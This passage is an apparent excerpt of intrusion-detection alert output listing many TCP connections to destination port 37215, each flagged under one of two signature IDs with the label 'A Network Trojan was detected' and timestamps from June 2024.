          SID:2835222
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571614
          SID:2835222
          Source Port:54570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721481
          SID:2829579
          Source Port:55944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224178
          SID:2829579
          Source Port:43502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137942
          SID:2835222
          Source Port:58712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400357
          SID:2829579
          Source Port:60230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480688
          SID:2829579
          Source Port:37752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718660
          SID:2829579
          Source Port:44056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103131
          SID:2829579
          Source Port:32820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226951
          SID:2835222
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414765
          SID:2835222
          Source Port:51388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168152
          SID:2829579
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557617
          SID:2835222
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034911
          SID:2835222
          Source Port:37112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132423
          SID:2829579
          Source Port:48640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037161
          SID:2829579
          Source Port:59276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469339
          SID:2829579
          Source Port:58872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864320
          SID:2829579
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297981
          SID:2835222
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035552
          SID:2829579
          Source Port:39164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.639967
          SID:2829579
          Source Port:54458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821296
          SID:2835222
          Source Port:57254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540340
          SID:2835222
          Source Port:34974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861957
          SID:2829579
          Source Port:45956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081673
          SID:2835222
          Source Port:58636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274539
          SID:2829579
          Source Port:42044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300871
          SID:2835222
          Source Port:33446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000582
          SID:2835222
          Source Port:55304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720021
          SID:2829579
          Source Port:37188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283746
          SID:2835222
          Source Port:41982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600511
          SID:2835222
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.646498
          SID:2835222
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552916
          SID:2829579
          Source Port:53998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714829
          SID:2835222
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.121486
          SID:2829579
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820360
          SID:2829579
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247407
          SID:2835222
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357425
          SID:2829579
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416060
          SID:2835222
          Source Port:39196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035701
          SID:2829579
          Source Port:46108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923751
          SID:2835222
          Source Port:34994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987780
          SID:2829579
          Source Port:48290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598072
          SID:2835222
          Source Port:54948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904630
          SID:2835222
          Source Port:56932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289513
          SID:2829579
          Source Port:43820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037130
          SID:2829579
          Source Port:35496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033870
          SID:2829579
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539711
          SID:2829579
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915603
          SID:2835222
          Source Port:49690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469629
          SID:2829579
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286651
          SID:2829579
          Source Port:38658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028212
          SID:2835222
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559633
          SID:2829579
          Source Port:41162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926262
          SID:2829579
          Source Port:49168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468013
          SID:2835222
          Source Port:44676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948793
          SID:2829579
          Source Port:54670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244965
          SID:2829579
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465612
          SID:2829579
          Source Port:49728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295672
          SID:2829579
          Source Port:52934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869726
          SID:2829579
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209019
          SID:2829579
          Source Port:42072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288354
          SID:2829579
          Source Port:58628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724274
          SID:2835222
          Source Port:41072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247610
          SID:2835222
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718403
          SID:2835222
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929646
          SID:2835222
          Source Port:49090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244295
          SID:2829579
          Source Port:33854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286630
          SID:2829579
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014386
          SID:2835222
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027277
          SID:2829579
          Source Port:56160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713675
          SID:2835222
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223270
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038597
          SID:2835222
          Source Port:58220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601976
          SID:2829579
          Source Port:51068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.717023
          SID:2835222
          Source Port:39222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243559
          SID:2829579
          Source Port:54154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645859
          SID:2829579
          Source Port:34108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166198
          SID:2829579
          Source Port:52400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396255
          SID:2835222
          Source Port:38564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081969
          SID:2829579
          Source Port:41608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226428
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476890
          SID:2835222
          Source Port:41382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296752
          SID:2835222
          Source Port:57114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160362
          SID:2835222
          Source Port:58438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718223
          SID:2835222
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566289
          SID:2829579
          Source Port:44702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986302
          SID:2829579
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166227
          SID:2829579
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647666
          SID:2829579
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284227
          SID:2829579
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718265
          SID:2829579
          Source Port:58024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598024
          SID:2835222
          Source Port:36382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418273
          SID:2829579
          Source Port:44238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038687
          SID:2829579
          Source Port:51676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400154
          SID:2835222
          Source Port:48840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952199
          SID:2829579
          Source Port:45418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718757
          SID:2835222
          Source Port:45816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596927
          SID:2835222
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289130
          SID:2835222
          Source Port:37316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989347
          SID:2829579
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948268
          SID:2829579
          Source Port:38448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076286
          SID:2835222
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466123
          SID:2835222
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036067
          SID:2835222
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923573
          SID:2835222
          Source Port:32986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287958
          SID:2829579
          Source Port:45786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996746
          SID:2835222
          Source Port:49302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.148132
          SID:2829579
          Source Port:44294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595717
          SID:2829579
          Source Port:35358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067329
          SID:2835222
          Source Port:58072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2829579
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720682
          SID:2835222
          Source Port:46916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864548
          SID:2835222
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296383
          SID:2829579
          Source Port:34820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080628
          SID:2829579
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.896027
          SID:2829579
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823580
          SID:2829579
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166114
          SID:2829579
          Source Port:56984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948916
          SID:2829579
          Source Port:43904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646316
          SID:2835222
          Source Port:34152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819988
          SID:2835222
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920466
          SID:2829579
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031564
          SID:2835222
          Source Port:37052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132751
          SID:2835222
          Source Port:35828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994418
          SID:2835222
          Source Port:35412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267359
          SID:2829579
          Source Port:47504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223656
          SID:2835222
          Source Port:42300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989744
          SID:2835222
          Source Port:47434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291245
          SID:2829579
          Source Port:56066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223013
          SID:2829579
          Source Port:52972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413060
          SID:2829579
          Source Port:36802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206607
          SID:2829579
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915067
          SID:2835222
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684600
          SID:2829579
          Source Port:33800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820649
          SID:2829579
          Source Port:35898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916874
          SID:2829579
          Source Port:54058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296250
          SID:2835222
          Source Port:52560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919091
          SID:2829579
          Source Port:50348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289212
          SID:2829579
          Source Port:42934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162220
          SID:2835222
          Source Port:57478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942148
          SID:2829579
          Source Port:35926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288964
          SID:2829579
          Source Port:49872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079101
          SID:2829579
          Source Port:47358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566163
          SID:2835222
          Source Port:33290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284957
          SID:2835222
          Source Port:57500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247651
          SID:2829579
          Source Port:34854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162399
          SID:2829579
          Source Port:59250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990485
          SID:2835222
          Source Port:52486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166678
          SID:2835222
          Source Port:36396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602803
          SID:2835222
          Source Port:59958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289396
          SID:2829579
          Source Port:32838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267416
          SID:2829579
          Source Port:38984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998614
          SID:2835222
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288195
          SID:2835222
          Source Port:50498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166047
          SID:2835222
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283983
          SID:2835222
          Source Port:55832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223785
          SID:2835222
          Source Port:41958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719781
          SID:2835222
          Source Port:46686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473671
          SID:2829579
          Source Port:43294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863759
          SID:2835222
          Source Port:50784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716748
          SID:2835222
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035532
          SID:2835222
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949257
          SID:2835222
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867122
          SID:2835222
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948983
          SID:2829579
          Source Port:41938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079435
          SID:2829579
          Source Port:40470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396985
          SID:2835222
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120631
          SID:2835222
          Source Port:47712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715630
          SID:2835222
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990276
          SID:2835222
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820269
          SID:2829579
          Source Port:41952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688095
          SID:2835222
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677444
          SID:2835222
          Source Port:60804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289798
          SID:2835222
          Source Port:42288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163308
          SID:2835222
          Source Port:38920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599151
          SID:2829579
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466199
          SID:2829579
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102662
          SID:2829579
          Source Port:56904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078817
          SID:2829579
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991497
          SID:2829579
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285536
          SID:2835222
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357403
          SID:2829579
          Source Port:35866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080414
          SID:2829579
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645594
          SID:2835222
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651336
          SID:2835222
          Source Port:45748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017339
          SID:2835222
          Source Port:47914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.645067
          SID:2829579
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296749
          SID:2829579
          Source Port:54980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224555
          SID:2829579
          Source Port:47234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163009
          SID:2835222
          Source Port:55332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248083
          SID:2829579
          Source Port:52428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921301
          SID:2829579
          Source Port:50126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676326
          SID:2835222
          Source Port:38102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035071
          SID:2829579
          Source Port:42060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716259
          SID:2835222
          Source Port:56262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028401
          SID:2829579
          Source Port:47754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162275
          SID:2835222
          Source Port:42330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289211
          SID:2829579
          Source Port:35972
          Destination Port:37215
